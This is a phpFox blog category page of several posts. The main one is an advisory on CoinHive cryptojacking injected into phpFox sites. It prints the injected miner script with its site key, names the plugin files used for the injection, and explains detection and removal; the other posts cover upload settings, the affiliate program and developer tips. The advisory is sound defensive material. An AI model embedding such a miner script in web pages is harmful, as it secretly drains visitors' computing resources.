Category: Guidelines

  • About CryptoCurrency Miner Script

    About CryptoCurrency Miner Script

    CryptoCurrency Miner Script Nowadays you can hear people talk much about cryptocurrencies everyday. Cryptocurrency is a new trend now and indeed everybody wants to have a piece of this cake. This trend resulted in the emergence of online platforms that allow webmasters to install coin miners into their websites as an alternative means of monetization. Unfortunately, hackers can also abuse coin miner scripts by injecting them to websites without awareness of webmasters to get some benefits.As reports and observations that we conducted recently, same as other popular platforms such as Wordpress, Joomla, etc., phpFox is also a target for hackers. They have injected in many phpFox sites without any permissions of webmasters. Among them, CoinHive is exposed as the most spreading and popular script which enables hackers to hijack sites and drain the resources of users when they access to sites. What is CoinHive? CoinHive is one of the most popular JavaScript cryptocurrency miners for websites. According to CoinHive creator, it is a JavaScript miner for the Monero Blockchain that webmaster can embed into their websites. Users run the miner directly in their browsers and mine for the webmaster in turn for an ad-free experience, in-game currency…Unfortunately, cybercriminals see this as an opportunity and have started abusing this tool by first hacking into websites and then embedding this JavaScript code into the core of popular platforms without the consent of site owner. Through this, hackers can use computers of site visitors to mine digital currency for them without users’ permissions.In fact, CoinHive hijacking issue is becoming a security threat among popular Social Network and CMS platforms. Hackers target these platforms because sites using these platforms attract a large volume of users on a daily basis which is the best for coin mining purpose. There are records of sites using Wordpress, Joomla, Magento, Drupal and many popular platforms as the victims of this kind of attack. Please refer to this article for more info. Certainly, our phpFox platform is not an exception to this plague. What are impacts of injected CoinHive script? By injecting CoinHive script into the core of the platform, the mining script will be called and run automatically by default when users load any page of the infected site. Once CoinHive script runs, resources on the computer of users will be hijacked and used as a coin miner. The script runs in background secretly so common users don’t even know the existence of the script to take actions.Under the effect of CoinHive miner script, common symptoms which site visitors can easily notice are:High CPU and graphics cards usage. The computer works slowly on the browser and other programs. The computer will eventually stop working with high load.How to detect websites using CoinHive script? As mentioned above, the most obvious way to know if a site has CoinHive script running is to measure the performance of your computer. If you visit a site and realize your computer runs slower than usual, and there are no announcements of site owner about using CoinHive as an alternative revenue, please contact the site owner immediately. There is a high possibility that the site is already hijacked by hackers and running coin miner scripts.On the phpFox platform, the quick and easy way to detect if CoinHive script is running is by pulling and examining the source of a page after logging in to the site (To view page source right-click on a page and select ‘View Page Source’).You might see on page source something similar to: <script>;$Ready(function() {setTimeout(function(){ var miner = new CoinHive.Anonymous('uoVwp8UScbNhkfzJn7rPNZFP3Pe1c54x');miner.start(); }, 10000);});</script> Notice the site key as marked red, this is the key generated by hackers. Any coin mined will be transferred to hackers by using this key.And: <script src="https://coinhive.com/lib/coinhive.min.js"></script> Those are indicators to show that a site is running CoinHive in the background.There is an easy way to detect and prevent CoinHive from running and eating up all computer resources is by using coin mining script blocker extensions on browsers.We suggest extensions such as:J2TeaM Security- Google Chrome: https://chrome.google.com/webstore/detail/j2team-security/hmlcjjclebjnfohgmgikjfnbmfkigocc/No Coin- Google Chrome: https://chrome.google.com/webstore/detail/no-coin-block-miners-on-t/gojamcfopckidlocpkbelmpjcgmbgjcl?hl=en- Firefox: https://addons.mozilla.org/en-US/firefox/addon/no-coin/ How is CoinHive injected into phpFox? Go in a little deeper, we figured when hackers have FTP access with the permission to modify files on phpFox site, they will insert this line to file:…/PF.Base/include/library/phpfox/template/template.class.phpThis will check for the existence of a plugin. if the plugin exists then the plugin will run and do something on the template. In this case, it is a plugin called template_getheader which is located at:…/PF.Base/module/core/include/plugin/template_getheader.phpThis file has simple content. It just plainly inserts the coin mining script to the header of phpFox main template file, so every page will load with the script embedded.In other words, the flow of these actions basically is:User requests to load a page. Template file will be called to render the page. Injected code in template file will execute and call the malicious plugin. The plugin will inset coin mining script into the template file. From corrupted template file, the page will be rendered out with the coin mining script attached. User loads page and also runs the script.Therefore, this is definitely NOT a security vulnerability in phpFox Script. Without FTP permission to access, create, upload or modify files, there is no way hackers can take advantage and penetrate scripts and files to the core of phpFox platform. How to remove CoinHive script? After testing the interactions of how hackers use the script on phpFox page, we suggest a simple solution to get rid of CoinHive script by removing malicious plugin file from the core of phpFox.As mention above, the malicious added file is located in:…/PF.Base/module/core/include/plugin/template_getXXXXX.phpWith testing, we concluded that after removing this malicious plugin file, the template file will no longer generate coin mining script on the page and will render normally. So users will be safe to access your site.Please note that the plugin file comes with many names, usually it in the format of template_getXXXXX.php such as template_getheader.php, template_gettemplate.php…An easier way to know the file is by referencing the created/modified date of the file. It’s usually the most recent created/modified file in the folder.However, this solution is suggested as just a temporary fix for an early stage of the investigation. We will conduct more research on the source and the origins to help you have better solutions. Anyway, any solutions won't work unless you manage FTP access seriously and carefully. How to prevent your site from injection of CoinHive script? Currently, we know for sure that hackers are unable to inject the scripts to your site without FTP permission to access and manipulate files.Therefore, manage FTP access seriously and carefully. Whenever you give FTP to any parties, you should create a separate account for each, so if any party creates/modifies anything on your site, their activities will be logged and you can reference or traceback in case anything happens. Make sure to enable FTP log and check the log on the date the malicious plugin file created, high chance you will know which party created/uploaded the file to your site. You will need to change the password of FTP accesses periodically or right after parties complete their works on your site.Also, please be aware of any suspicious apps and modules. Make sure you purchase them from trustable developers/companies. If you think an app causes this issue, please don’t hesitate to contact phpFox team, we will review the app and take appropriate actions if needed. All bits of help is appreciated in the process.Lastly, backup your site regularly. Notice changes on your site, if your site doesn’t work as usual (slower, sluggish…), please check for the interaction of coin mining script as mentioned above. In case of the issue is happening, revert back to the latest backup and trace what changes you made which might cause the issue (Installed an app, gave FTP to someone…) Report Abuse to CoinHive team Also, if you think a site is using CoinHive script without any notice of the usage to users, you can report CoinHive abuse here. Make sure you have the site key when reporting the abuse.In any case, you can always contact us to seek assistance.phpFox Team
  • How to increase video size upload in phpFox?

    How to increase video size upload in phpFox?

    The phpFox script supports uploading videos. And as admin of the site, you'd be able to change the size limit for all the video uploads. In this article, you will learn on how to increase the video size upload in your phpFox site.Simple steps on how to increase the video size upload in phpFox First, you need to login to your site as an Admin. Go to User Groups to manage the settings of the user group. By default, phpFox script has 4 different UserGroups as shown in the picture below. But you can add more user groups as you want. Select the specific UserGroup that you would like to increase the video size upload. In the picture below, I am trying to manage the user settings of the Registered User. After selecting the specific user group, select the Video under the Core Apps settings. By default, the script maximum video file size under the Registered User is 10MB. You can change this value to any value you want. In this case, let's try to change it to 100MB so that all the Registered Users belong to this UserGroup can upload videos up to 100MB. After changing the value of Maximum file size of video uploaded (MB) to 100, Scroll down and click SAVE CHANGES.After Saving the changes, you will need to clear the cache in order for your changes to take effect. Just go to MAINTENANCE > CACHE MANAGER > click CLEAR CACHE button. After clearing the cache, you can go back to your site's frontend and check if the video upload size setting was changed. As you can see, the Max file size for the video upload was changed to 100MB.From now on, you will be able to control the file size of the videos your members can upload to your site. Request for Tutorials If you have any blog requests on how to do things on your site, please submit a ticket in your client area or chat with our agent on our website and we will try to post them all in our future blogs. Moreover, you can check our phpFox Docs for more tutorials.
  • phpFox Affiliate – How It Works

    phpFox Affiliate – How It Works

    This post is to explain more how the phpFox Affiliate works, provides you with all affiliate banners and necessary instructions. phpFox Affiliate banners To those who are already active Affiliates of phpFox sales, the following banners are for you to use on your websites, blogs or wherever you want to put it together with your Unique Referral Link.Medium Rectangle banner (300x250):This banner should be embedded within text content or at the end of articles.  Leaderboard banner (728x90):This banner should be placed above main content, and on forum sites.  Affiliate Panel How to get your Unique Referral Link and see Your referralsLogin Client Area Click Affiliates on the menu Get Your Unique Referral LinkSee your referralsThe current Affiliate Earning Percentage is 20% It is the percentage of each payment that you receive. The current Affiliate Commission Delay is 30 days It is the number of days from the date your referral purchased phpFox's product (license or service) to the date its commission is available for you to withdraw (if accounts are still active). How to withdraw your commission You will be able to request a withdrawal as soon as your balance reaches the minimum required amount of $100.00 USD.In the above example, the affiliate needs to wait until the Commissions Pending Maturation: $59.80 USD becomes an available commission and is added to its Available Commissions Balance. The Available Commissions Balance then will be $149.65 USD and ready to withdraw.Click the Request Withdrawal button. It will create a ticket on your behalf. Our staff will then follow up with you in the ticket and proceed to send you your available commission payment.See also the instruction how to register as a phpFox Affiliate.
  • Earn Money in phpFox’s Affiliate Program

    Are you a full-time employee looking for an additional way to Earn Money? Or maybe you're one of those freelancers working in the most flexible way in their chosen field. Either you belong to any of these two or you are anyone who is looking for a faster way to earn money, you're on the right page. You will learn here on how you can make an income in a faster way with just a few and easy steps to follow.Many of our Affiliates are earning not just hundreds but thousands of dollars within few days for doing great and effective strategies in Affiliate Marketing. You will discover those strategies in the next parts of this article.But the first thing you need to know is to learn what an Affiliate Marketing is all about and how you will get money from it. In general, an Affiliate Marketing is one of the forms of marketing wherein you refer someone to an online product, and when that person purchase that product from your recommendation, you will receive a commission.In phpFox's Affiliate Program, you will not receive just a commission but a big commission for every purchase from your recommendation. We will discuss in details later on this article what products and services are covered in this Affiliate Program. How can I become an Affiliate? A good question to start with. The very first step towards your goal is to register yourself to become an Affiliate. Don't worry, registration is FREE. You don't have to pay anything to become an Affiliate.  Anyone can become an Affiliate. Whether you are a student or a professional, you are welcome to register. As long as you have your own PayPal Account where we can send your earnings, you can be an Affiliate. Once you successfully registered as an Affiliate, you will have an account in our Client Area. In the Client Area, you can see all your earnings and the numerical figures in your Affiliate Account. Here's the step by step guide on how to register as an Affiliate.Go to the Affiliate section on our website https://www.phpfox.com/affiliate/ Click the Join Now Button You will be redirected to this page https://clients.phpfox.com/affiliates.php Since you don't have an account yet, you need to Register first. You can find the registration option on this page under Account menu. Just select the Register menu. Once clicked the Register menu, you will be redirected to this page https://clients.phpfox.com/register.php to create a client account in phpFox. Just make sure to fill up the text fields with your correct information as we will use this as a reference to send your earnings. You will need to verify your account with the link sent to your email address. After verifying, you can now log in to your account. Once login, you can activate your Affiliate Account in the Affiliates menu. After activating your Affiliate Account, you can see your unique referral link. Affiliate real-time statistics are also on this page. Statistics show the figures for clicks, signups, and conversions to keep you up to date. You can also see the list of all your referrals on this page. Referrals are the names of the people who purchased the script under your recommendation.Why do I need to have a Paypal Account? You need to have a PayPal account because this is where we send your earnings. You will be able to request a withdrawal as soon as your balance reaches the minimum required amount of $100. What should I do to earn money? Now, this is the most important part of being an Affiliate. There are many ways you can do to earn money in Affiliate Program. One of the most effective strategies to become a successful Affiliate is by creating blogs about phpFox. You can start blogging for free via WordPress. You can post your blogs to different social media sites, pages, forums, groups, etc.  Just make sure to highlights the social network features especially the monetization feature on your blog to attract more readers.  And don't miss to put your unique referral link on your blogs as this will serve as the bridge to connect these readers to become potential clients.There are some tips you can learn in the article How to Make Money in Social Network that you can use in writing your blogs. Remember, your goal is for the people to click the unique referral link given to you. You can also research other strategies online about Affiliate Marketing to gain more traffic on your blogs. The more people you reach, the more clicks you will get. The more clicks you will get the bigger the chances they will purchase and the bigger commission you will earn.What will I get after people purchase? You will get 20% commission for every purchase in any of these phpFox products and services including license, hosting,  and other services such as Quick Start and Launch packages.  To give you an idea, imagine a scenario when someone purchased a license from your unique referral link. In phpFox, we have three different license packages. The LITE, BASIC and PRO.  When someone purchases the PRO package worth $539, you will automatically get 20% commission on this purchase It means, you will receive $107.8 since this is the 20% of $539. Therefore, you can earn $1078 commission with just 10 license purchases. How much more if you've got more purchases? Obviously, you will get higher earnings.One great advantage as an Affiliate is you manage your own time. We are not going to require you to do it. You can do it anywhere. You can do this at home, coffee shops, or anywhere you'd like to be.As a result, as an Affiliate, you will be able to earn money by doing things at your convenience while having fun. You can also contact us via live chat on our website or send us an email at hello@phpfox.com if you have any question. In Addition to this, you can also check out the Affiliate Policy at https://www.phpfox.com/affiliate/ for more details about commission rules of our Affiliate Program.There are a lot of more ways you can advertise your affiliate link. Some are paid and some are free. Google has a plethora of results for marketing and advertising so feel free to also do your own searching but we'll put a few tips here.Add it to your signature in websites you are a member. Make sure they allow this first. Become a member of websites for webmaster help and answer questions about the phpFox script, about social network scripts, about cms scripts or about starting a website. Family, friends and business associates are a good free way to market. Some might want a site of their own or maybe they know someone that does. Put your affiliate link in your email signature. Take out some ads in search engines, on hosting forums, on technical support forums. Put an ad on your own site if you don't mind folks knowing what script you use. Offer services to make websites. Let your clients purchase the phpFox script with your affiliate link and then set up the site for them after. Post on social media with tips for starting websites and include your affiliate link in some of the posts. You won't want to put it in every post as that can turn people off from reading your posts. You need to grow your following with relevant posts.We hope the above tips help you to take your affiliate account to high levels and grow your bank account!Disclaimer: phpFox cannot guarantee that you will earn specific amounts, or anything at all, with the affiliate program. Your earnings are directly impacted by your efforts. As such, it is out of our control as to how much you may or may not earn.
  • phpFox Store Policy – Highlight Notes you should know

    As you may have known, we are still in progress of improving the phpFox store day by day. The goal is to create a store listing all products created by our 3rd party developers. This creates a trusted environment for our clients and it also brings benefits to our developers too. Developers can develop, submit to get approval and sell their products in phpFox store. A product can be an app, a theme, a language pack or a package. Products in the store can have feedbacks (in term of reviews and ratings by clients) and are promoted automatically to featured, top rated section followed our defined criteria. Also, developers are allowed to report an abused review to admin and provide necessary info to prove that.Developers are acknowledged and showcased in the developers listing page for clients to approach and contact, to ask for support or offer works.We currently have a special discount to purchase the phpFox developer license for those who have products in store or will submit products to store within 30 days after they are listed in developers page.Clients can find and purchase products in store embedded right in AdminCP of their phpFox site (e.g. http://yoursite.com/admincp/). Only Developers login is allowed in phpFox web store - https://store.phpfox.com/login in the mean time and Client login is not allowed but it will very soon be available in our next upgrades for the store.(more…)
  • New phpFox Store Improvements

    Despite freezing weather and Christmas lights shining all over the city, phpFox has not ever slowed down on our new product releases and future updates.We've got some fascinating news all lined up for you to know and prepare for your apps, templates, languages, packages in phpFox Store:Hovering tooltip shows Meta Description of the appYou may want to update your Meta Description of your app now because currently when the user hovers to an app in phpFox store, it shows the Meta Description of the app.Update the Meta Description in phpFox Store>> Manage Products >>  Description(more…)
  • Spice it up with Apps, Themes and Languages!

    This article focuses on our phpFox store and how you can spice up your site with some third party products! Perhaps you have noticed that phpFox third party developers have been busy adding Apps, Themes and Languages to the store in recent months. These products should help you to make your site unique for your users.Just so you know, our store also features a listing of all third party developers, complete with ratings! This will help you find a developer if you need custom work done.For more details...(more…)
  • Monetizing with the Marketplace

    We had planned on doing our first one on a third party developer but he's still working on his interview and some things for the store so we'll do that article when he's ready. This time, we'll revisit the first phpFox inFocus we originally did for the Marketplace. Since our Neutron product line has a different look and features, we want to revisit old articles to bring new ideas and show some new apps that can be used with it.(more…)
  • Developers Tip: Working with blocks in phpFox 4.3

    Creating blocks in v4 has changed a rather lot with how we create blocks in phpFox in comparison to v3. Creating blocks are done on the fly in an apps start.php file and can be placed on any controller. The current issue we faced is allowing Admins to change the location of a block and allow them to order blocks.In our upcoming release, 4.3 we have included a new method for developers to work with blocks that will also give Admins the power to manage them.With our current version you can create a block in your start.php using the following method.[code]block(1, 'core.index-member', function() {echo "Hello World!";});[/code]In 4.3+ you can use the current method or open up your app.json and assign blocks with unique identifiers. Here is an example[code] { "id": "App_ID", "name": "App Name", "blocks": [ { "callback": "unique_name", "route": "core.index-member", "location": 1 } ] } [/code]Now that you have assigned a block you can create the callback connection in your start.php.[code] block('unique_name', function() { echo "Hello World!"; }); [/code] By using this new method, it registers your block automatically to the block database, which then allows Admins to assign your block to specific routes and/or locations.
  • Developers Tip – Working with Global & User Group Settings in Neutron

    Adding settings to your app is done a little differently in Neutron in comparison to Nebula. Everything can be done from the comfort of your app.json file.To learn more, Check out the article
Fox
phpFox 4.6.0 Release - a new level of Social Network PlatformLearn More!